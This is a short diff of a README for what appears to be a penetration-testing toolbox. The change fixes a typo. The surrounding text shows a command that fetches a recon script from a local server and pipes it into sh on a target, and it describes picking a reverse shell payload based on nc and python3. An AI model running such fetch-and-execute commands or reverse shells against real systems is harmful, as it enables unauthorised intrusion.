AlanFoster/toolbox/readme.md

 wget http://localhost:8000/shells/recon.sh -O- | sh
 ```

 The server console will now log information about the remote target.
-In the below scenario we can see that the target is running as `root`, and has both `nc` and `python3` available - which is enough information to get a decide on a reverse shell payload:
+In the below scenario we can see that the target is running as `root`, and has both `nc` and `python3` available - which is enough information to decide on a reverse shell payload:

 ![Example of the extracting data from the target](./images/recon.png)